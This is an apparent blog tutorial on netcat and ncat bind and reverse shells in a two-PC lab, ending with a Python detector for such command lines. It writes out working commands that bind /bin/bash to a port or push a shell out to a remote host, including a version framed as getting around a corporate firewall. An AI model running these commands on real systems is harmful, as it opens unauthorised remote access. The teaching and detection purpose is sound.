HOWTO Using Bind Shell and Reverse Shell

Now let's review how to use a bind shell and a reverse shell. You need two workstations for this exercise: the 1st PC (InsiderPC with IP 192.168.10.100) is in your network and the 2nd PC (OutsiderPC with IP 192.168.10.200) is on the outside network.

For the bind shell, run this command on your OutsiderPC (Bob's workstation).


nc -nvlp 5555 -e /bin/bash

This starts netcat listening on port 5555 (you can of course use another port number) and allows the client (InsiderPC) to connect and get a bash shell command prompt. It prepares Bob's workstation to listen on port 5555 so Alice can connect.

From the InsiderPC (Alice's workstation), connect using the following command.

nc -nv 192.168.10.200 5555

Press [Enter]. The IP address is the one assigned to the OutsiderPC.

When you type "ifconfig" you will see the IP address of the OutsiderPC, because you are executing this command on the OutsiderPC.

This allows Alice to connect to Bob's workstation and take control for administration purposes.

Now the reverse shell. The difference is that the client (InsiderPC) will provide the executable file. Let's begin by preparing our OutsiderPC to listen. On the OutsiderPC, type the following command.

nc -nvlp 5555

From the InsiderPC, connect using the following command.

nc -nv 192.168.10.200 5555 -e /bin/bash

Press [Enter]. The IP address is the one assigned to the OutsiderPC (Bob's workstation).

Alice is located in the corporate network behind a firewall, so she will not be able to accept connections coming from outside (Bob), though she can make outbound connections, which allows her to connect to Bob's workstation with the netcat connection tied to a local shell. Once this connection is made, Bob will have access to Alice's computer on her behalf. This is similar to a remote access tool.

On the OutsiderPC, type "ifconfig" and you will see the InsiderPC IP address, because you are using the InsiderPC (Alice) to execute the command.


Please note that netcat traffic is not encrypted. All transactions are in plain text. The NCAT tool provides the encryption that is not available in the netcat command. The process is similar whether you use a bind shell or a reverse shell.

UPDATED: Here's the command using an NCAT encrypted session for a bind shell.

# ncat -lvp 5555 -e /bin/bash --allow 192.168.2.100 --ssl

where -lvp listens on port 5555, -e /bin/bash (or -e cmd.exe for Windows) binds the shell, --allow permits the remote IP address to connect, and --ssl encrypts the session.

To connect from the remote PC with an IP address of 192.168.2.100, use the following command.

# ncat -v 192.168.2.200 5555 --ssl

where we connect to the remote PC 192.168.2.200 that gave us permission, using port 5555, with --ssl for an encrypted session.

And for the reverse shell, use these commands.

PC1 # ncat -lvp 5555 --allow 192.168.2.100 --ssl

PC2 # ncat -v 192.168.2.200 5555 -e /bin/bash --ssl

You can use Wireshark or another network traffic sniffing tool to check if your session is encrypted.
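From the defender's side, the bind and reverse variants above differ only in which end carries -e, and with --ssl the shell traffic is no longer readable on the wire, so process command lines are where these sessions show up. The following is an added example, not part of the original post: a small Python classifier for such command lines. The function name classify and the sample lines are constructed for illustration, and it only understands the options used in this post.

```python
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat"}

SAMPLE_CMDLINES = [  # constructed, modelled on the commands in this post
    "nc -nvlp 5555 -e /bin/bash",
    "nc -nvlp 5555",
    "nc -nv 192.168.10.200 5555 -e /bin/bash",
    "ncat -lvp 5555 -e /bin/bash --allow 192.168.2.100 --ssl",
    "ncat -v 192.168.2.200 5555 -e /bin/bash --ssl",
]

def classify(cmdline):
    """Return None unless netcat is run with -e/--exec; else describe the shell."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    listen, ssl, program, port, positional = False, False, None, None, []
    args = iter(argv[1:])
    for arg in args:
        if arg in ("--ssl", "--listen"):
            ssl, listen = ssl or arg == "--ssl", listen or arg == "--listen"
        elif arg == "--exec":
            program = next(args, None)
        elif arg == "--allow":
            next(args, None)              # skip the allowed peer address
        elif arg.startswith("--"):
            continue                      # other long options are ignored
        elif arg.startswith("-") and len(arg) > 1:
            flags = arg[1:]               # clustered short flags, e.g. -nvlp
            listen = listen or "l" in flags
            if flags.endswith("e"):
                program = next(args, None)
            elif flags.endswith("p"):
                port = next(args, None)
        else:
            positional.append(arg)
    if program is None:
        return None                       # plain listener or client, no shell
    if listen:                            # shell is served to whoever connects
        peer, port = None, port or (positional[-1] if positional else None)
    else:                                 # shell is pushed out to a remote peer
        peer, port = (positional + [None, None])[:2]
    return {"kind": "bind" if listen else "reverse", "program": program,
            "peer": peer, "port": port, "ssl": ssl}

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(f"{line!r:62} -> {classify(line)}")
```

The same function can be fed command lines pulled from process-creation logs; a "reverse" result names the outside peer and port to look for in firewall or flow records.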

Always encrypt. Always secure.

EM @QUE.COM
